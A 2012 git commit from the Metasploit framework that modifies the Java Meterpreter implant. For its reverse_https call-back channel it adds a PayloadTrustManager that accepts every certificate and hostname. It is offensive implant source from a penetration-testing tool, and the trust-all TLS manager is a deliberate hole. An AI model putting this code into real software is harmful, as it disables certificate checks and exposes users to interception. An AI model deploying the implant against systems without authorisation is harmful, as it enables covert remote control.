Squashed commit of the following:

commit 97755336f2227a7db668b61e548d2956dddaccb8
Author: Michael Schierl <schierlm@gmx.de>
Date:   Thu Apr 5 22:33:40 2012 +0200

    make sure PayloadTrustManager gets dropped when using Spawn > 0

commit 0d096043e23af5d46a20b7f2c30c5d926ff66f8d
Author: Michael Schierl <schierlm@gmx.de>
Date:   Wed Apr 4 22:15:23 2012 +0200

    Fix connection hangs when using java/meterpreter/reverse_https with recent Java versions

    Reason is that Java thinks the SSL certificate presented by Metasploit is untrusted;
    therefore add a hack similar to the one in the metasploit.Payload class to trust all
    certificates here.

[Closes #303]

external/source/meterpreter/java/src/meterpreter/com/metasploit/meterpreter/Meterpreter.java

@@ -167,6 +167,15 @@ public class Meterpreter {
 			TLVPacket request = null;
 			try {
 				URLConnection uc = url.openConnection();
+				if (url.getProtocol().equals("https")) {
+					// load the trust manager via reflection, to avoid loading
+					// it when it is not needed (it requires Sun Java 1.4+)
+					try {
+						Class.forName("com.metasploit.meterpreter.PayloadTrustManager").getMethod("useFor", new Class[] {URLConnection.class}).invoke(null, new Object[] {uc});
+					} catch (Exception ex) {
+						ex.printStackTrace(getErrorStream());
+					}
+				}			
 				uc.setDoOutput(true);
 				OutputStream out = uc.getOutputStream();
 				out.write(outPacket == null ? RECV : outPacket);

external/source/meterpreter/java/src/meterpreter/com/metasploit/meterpreter/PayloadTrustManager.java

@@ -0,0 +1,63 @@
+package com.metasploit.meterpreter;
+
+import java.net.URLConnection;
+
+import javax.net.ssl.HostnameVerifier;
+import javax.net.ssl.HttpsURLConnection;
+import javax.net.ssl.SSLContext;
+import javax.net.ssl.SSLSession;
+import javax.net.ssl.SSLSocketFactory;
+import javax.net.ssl.TrustManager;
+import javax.net.ssl.X509TrustManager;
+import java.security.cert.X509Certificate;
+
+/**
+ * Trust manager used for HTTPS URL connection. This is in its own class because it
+ * depends on classes only present on Sun JRE 1.4+, and incorporating it into
+ * the main {@link Meterpreter} class would have made it impossible for other/older
+ * JREs to load it.
+ * 
+ * This class is substantically identical to the metasploit.PayloadTrustManager class,
+ * only that it tries to cache the ssl context and trust manager between calls.
+ */
+public class PayloadTrustManager implements X509TrustManager, HostnameVerifier {
+
+	public X509Certificate[] getAcceptedIssuers() {
+		// no preferred issuers
+		return new X509Certificate[0];
+	}
+
+	public void checkClientTrusted(java.security.cert.X509Certificate[] certs, String authType) {
+		// trust everyone
+	}
+
+	public void checkServerTrusted(java.security.cert.X509Certificate[] certs, String authType) {
+		// trust everyone
+	}
+	
+	public boolean verify(String hostname, SSLSession session) {
+		// trust everyone
+		return true;
+	}
+
+	private static PayloadTrustManager instance;
+	private static SSLSocketFactory factory;
+	
+	/**
+	 * Called by the {@link Payload} class to modify the given
+	 * {@link URLConnection} so that it uses this trust manager.
+	 */
+	public static synchronized void useFor(URLConnection uc) throws Exception {
+		if (uc instanceof HttpsURLConnection) {
+			HttpsURLConnection huc = ((HttpsURLConnection) uc);
+			if (instance == null) {
+				instance = new PayloadTrustManager();
+				SSLContext sc = SSLContext.getInstance("SSL");
+				sc.init(null, new TrustManager[] { instance }, new java.security.SecureRandom());
+				factory = sc.getSocketFactory();
+			}
+			huc.setSSLSocketFactory(factory);
+			huc.setHostnameVerifier(instance);
+		}
+	}
+}